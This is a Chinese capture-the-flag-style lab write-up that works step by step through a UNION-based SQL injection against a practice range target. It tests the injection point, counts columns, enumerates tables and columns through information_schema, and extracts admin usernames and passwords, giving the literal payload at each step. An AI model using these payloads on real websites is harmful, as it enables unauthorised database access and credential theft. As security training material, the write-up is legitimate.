尤里的复仇(1)——掌控者
获取网址:宠物猫 异国短毛猫 纯种猫 加菲猫 波斯猫 辛巴猫舍 纯种双色/梵文波斯、异国小猫 CFA注册猫舍纯种猫 猫舍 ,辛巴猫舍为CFA注册猫舍,繁育纯种波斯猫和异国短毛梵纹猫
http://cntj8003.ia.aqlab.cn/
判断是否存在sql注入漏洞
构造 ?id=1 and 1=1 ,回车
页面正常
构造 ?id=1 and 1=2 ,回车
页面不正常,初步判断这里 可能 存在一个注入漏洞
判断字段数
构造?id=1 and 1=1 order by 1,回车
页面正常
构造 ?id=1 and 1=1 order by 2 回车
页面正常
构造 ?id=1 and 1=1 order by 3 回车
页面返回 错误,判断字段数为2
判断回显点
构造 ?id=1 and 1=2 union select 1,2 回车
页面出现了 2 ,说明我们可以在数字 2 处显示我们想要的内容
查询相关内容
查询当前数据库名
构造 ?id=1 and 1=2 union select 1,database() 回车
查询当前数据库版本
构造 ?id=1 and 1=2 union select 1,version() 回车
查询当前数据库 表名
构造 ?id=1 and 1=2 union select 1,table_name from information_schema.tables where table_schema=database() limit 0,1 回车
绝大数情况下,管理员的账号密码都在admin表里
查询字段名
构造 ?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 0,1 回车
第一个字段ID
构造 ?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 1,1 回车
第二个字段username
构造 ?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 2,1 回车
第三个字段为password
查出 admin 表里 有 id username password 三个字段
查询字段内容
构造 ?id=1 and 1=2 union select 1,username from admin limit 0,1 回车
构造 ?id=1 and 1=2 union select 1,password from admin limit 1,1 回车
构造 ?id=1 and 1=2 union select 1,password from admin limit 2,1 回车
limit 2,1 没有回显,说明有两个用户
构造 ?id=1 and 1=2 union select 1,password from admin limit 0,1 回车
获得admin密码啦hellohack
构造 ?id=1 and 1=2 union select 1,password from admin limit 1,1 回车
这是另一个用户的密码
尤里的复仇(1)——掌控者相关推荐
- 尤里复仇退出界面_红色警戒2、尤里的复仇win10卡死、分辨率太大、黑屏问题多种解决方法(已测)...
Windows 10如约而至,用户在尝试新系统新感觉体验的同时,红色警戒(红色警戒2尤里的复仇,以下简称YR)--这款老游戏的命运又会如何呢?相信大家现在最关心的是:Windows 10到底能不能正常 ...
- 红警2尤里的复仇中文完整PC版
[红色警戒2尤里的复仇]还记得在<红色警戒2>中那个超人尤里吗?这次在资料片<红色警戒2尤里的复仇>中他将成为一军的领袖,与同盟军对抗,野心勃勃的尤里利用自身拥有的心灵控制能力 ...
- 【封神台 - 掌控安全靶场】尤里的复仇 Ⅰ 小芳!一二三四五六七章
[封神台 - 掌控安全靶场]尤里的复仇 小芳! 第一章:为了女神小芳! SQL注入攻击原理实战演练 一.判断是否存在sql注入漏洞 二.判断字段数 三.判断回显点 四.正式注入 五.sql自动化注入 ...
- 封神台-第二章 尤里的复仇
封神台-第二章 尤里的复仇 1. 任意选择一条新闻动态 2. 发现出现交互界面 url中id=170 存在注入点 3.判断字段数 ?id=170+order+by+10 ?id=170+order+b ...
- 封神台-尤里的复仇Ⅰ
靶场链接:https://hack.zkaq.cn/ 文章目录 前言 四.为了更多的权限!留言板! 五.进击!拿到Web最高权限! 总结 前言 本来打算把尤里的复仇都做了,做到六就卡住了,不想做了,以 ...
- 尤里的复仇II 回归【7题】
尤里的复仇II 回归[7题] 渗透第一步-信息收集 1 渗透第一步-信息收集 2 基础环境搭建 sqlmap尝鲜题 sql-注入绕过防护getshell awd攻防靶场-fuzz乱拳打死老师傅 归来- ...
- 【封神台 - 掌控安全靶场】尤里的复仇 Ⅰ 小芳 一二三四五六章
[封神台 - 掌控安全靶场]尤里的复仇 Ⅰ 小芳 一二三四五六章 文章目录 [封神台 - 掌控安全靶场]尤里的复仇 Ⅰ 小芳 一二三四五六章 第一章:为了女神小芳 SQL注入攻击原理实战演练 第二章: ...
- 尤里的复仇II 回归
尤里的复仇II 归来 sqlmap尝鲜题 sql-注入绕过防护getshell sqlmap尝鲜题 Tips: 在修练的过程中,尤里发现在这个领域有很多的神器,只要获得这些神器,就可以让测试更加轻松- ...
- 尤里复仇退出界面_win7系统下红警2尤里的复仇如何改成窗口化运行
红警2尤里的复仇是一款备受玩家喜爱的游戏之一,然而在玩游戏过程中,有时候想要游戏截图,却发现截图效果很差,就想要给红警2尤里的复仇改成窗口化运行,这样就比较好看多了,那么要怎么操作呢,本教程就给大家分 ...
- 尤里的复仇Ⅰ 小芳!
尤里的复仇Ⅰ 小芳! 第三章:为了更多的权限!留言板! 判断是否为xss跨站脚本攻击 查看cookie 利用xss平台 flag就在cookie里面 第四章:进阶!拿到Web最高权限! 修改为管理员c ...
最新文章
- kafka 批量 回写mysql_kafka往mysql写数据操作笔记
- 购买《四级网络工程师预测试卷与考点解析》,哪里最便宜?
- C语言实现二进制文件读写
- OpenCV图像数据访问,查询表和时间消耗测试
- UA OPTI570 量子力学29 摄动理论简介
- Kinect 动作识别组件概要设计
- java字母反过来_java之字母反转~~ - Plight - 51Testing软件测试网 51Testing软件测试网-软件测试人的精神家园...
- linux i2c adapter 增加设备_LINUX设备驱动模型分析之四 设备模块相关(DEVICE)接口分析...
- python操作xpath 0227
- Multi-thread--C++11中std::unique_lock的使用
- About_PHP_验证码的生成
- 2017.7.18 树上距离=k 思考记录
- gc:C语言的垃圾回收库-中文
- selenium rc java_selenium RC+JAVA 笔记 一
- revit建筑样板_BIM技术在历史保护建筑中的具体应用(艾三维BIM分享)
- js 冒泡排序_JS 里的简易算法和数据结构之复杂度
- 5. Web 的结构组件
- RN:Android 开发记录
- eclipse导入wsdl文件_Eclipse+Axis使用WSDL文件生成Web Service服务端/客户端
- ios手游游戏辅助挂机工具_ios挂机RPG游戏大全_iPhone挂机RPG类手游排行榜_ios挂机RPG类手游精选推荐_ios挂机RP类手游下载...
热门文章
- mysql错误码与标识
- 苹果电脑安装双系统--win7
- python正则替换空格_Python|文本处理:用正则表达式替换掉汉字(非英文)中间的空格...
- 永磁同步电机矢量控制(七)——基于id=0的矢量控制的动态解耦策略
- Win8.1使用经验存档-2014.1.17
- 【MADDPG(MPE)——环境配置与用法详细介绍(多智能体强化学习))】
- 1020 月饼(C语言版 + 注释 + 贪心算法)
- 企立方:拼多多差评的处理应该怎么办
- 无线路由器解决方案 MR500E工业级4G路由器可实时监控4G信号强度
- Spring Boot Admin系列(3)-Spring Boot Admin添加登录认证